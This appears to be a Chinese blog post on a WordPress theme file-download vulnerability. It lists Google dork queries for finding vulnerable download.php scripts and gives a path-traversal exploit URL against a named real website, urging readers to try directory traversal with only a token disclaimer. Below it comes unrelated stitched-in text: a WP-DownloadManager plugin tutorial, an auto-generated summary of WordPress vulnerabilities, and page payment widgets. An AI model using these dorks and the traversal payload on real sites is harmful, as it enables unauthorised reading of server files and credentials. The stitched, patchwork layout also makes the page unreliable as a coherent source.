WordPress 文件下载漏洞

Google dork:inurl:"/wp-content/themes/liberator/inc/php/download.php"

exploit:https://www.televox.com/webvox/wp-content/themes/liberator/inc/php/download.php?download_file=../index.php

 

google dork: 

inurl:"/wp-content/themes/newspro2891/download.php"

inurl:"/wp-content/themes/cafesalivation/download.php"

inurl:"/wp-content/themes/duena/download.php"

可以尝试跨目录访问,碰下运气,稳一波

各位可以自行测试,请勿非法使用!!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WordPress文件下载插件,那么就非WP-DownLoadManager插件莫属了,此插件可以说功能强悍,它可以添加本地文件、远程文件、可以自定义本地文件在服务器上的路径,可以修改在前台显示的模板参数。 WP-DownLoadManager插件安装: 下载wp-downloadmanager插件,将文件解压缩,上传到/wp-content/plugins/目录。 登录wordpress后台控制面板激活该插件,这是后台左侧栏或多出个Downloads标签,点击标签会出现下拉列表,可以对其进行相应的设置。 下拉列表中主要有: Manage Downloads:管理下载 Add File:添加文件 添加下载的文件,在页面中可以上传文件、删除文件、设置下载文件名以及描述等内容。 Download Options:下载选项 下载选项,这里主要设置下载的路径、下载的URL、下载页面的URL、下载的连接、下载的方式等内容,不是太难,这里不做过多介绍。 Download Templates:下载模板,设置模板样式 Uninstall WP-DownloadManager:卸载WP-DownloadManager 添加下载: a.日志中添加下载:大家可以看到当你激活该插件后“添加新文章”时会多一个“下载”选项图标,点击以后只需填入阿拉伯数字,然后在页面中会插入[download id="ID"],此阿拉伯数字即为ID(你添加下载文档时的ID)。 [download id="ID" display="both"],display=”1″表示只显示你的文件名;display=”both”表示显示你的文件名和文件简介! [download id="1,2,3" category="4,5,6"] 为显示多个下载文件为1,2,3的文档,category=”4,5,6″为对应的分类ID。 b.在页面中添加下载:当你添加页面时在内容框插入:[page_download]或[page_download category="1"]即可填写下载了 c.主题模板中添加,添加时,你可使用代码进行,也可使用widget。 使用代码方法: 最新下载使用 <?php if (function_exists('get_recent_downloads')): ?> <?php get_recent_downloads(10); ?> <?php endif; ?> “10”为你要显示的下载文档数 显示分类下载 <?php if (function_exists('get_downloads_category')): ?> <?php get_downloads_category(1, 10); ?> <?php endif; ?> “1”为分类ID,“10”为你要显示的下载文档数 最多下载使用 <?php if (function_exists('get_most_downloaded')): ?> <?php get_most_downloaded(10); ?> <?php endif; ?> “10”为你要显示的下载文档数 使用Wideget:在激活插件的同时,也要激活插件的Wideget,激活后,在左边的侧栏中,点击"Appearance"-->Widegets,添加Most Downloaded(最多下载)和Recent Downloads(最近下载)即可,使用这种方式添加,内容会出现在前台页面的侧栏。
回答: WordPress存在一些安全漏洞,其中包括SQL注入漏洞和远程代码注入漏洞。SQL注入漏洞是由于clean_query函数的校验不当导致的,可能通过插件或主题触发。这个漏洞已经在WordPress5.8.3中修复,影响的版本可以追溯到3.7.37。\[1\]远程代码注入漏洞是在WordPress5.0.0版本中发现的,主要是由于image模块存在漏洞,可以获取目录权限和进行文件包含,从而导致远程代码注入成功。\[2\]这个漏洞只存在于WordPress5.0.0版本,其他版本不受影响。漏洞的发生是因为裁剪图片功能存在注入,可以远程读取图片并将恶意的代码图片文件写入网站根目录,最后利用文件包含漏洞生成SHELL获取网站的最高权限。\[3\]为了保护网站安全,建议及时升级到最新版本的WordPress,并定期检查和更新插件和主题。 #### 引用[.reference_title] - *1* [(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现](https://blog.csdn.net/weixin_50464560/article/details/126744468)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [WordPress网站漏洞利用及漏洞修复解决方案](https://blog.csdn.net/ctjot22080/article/details/100324184)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值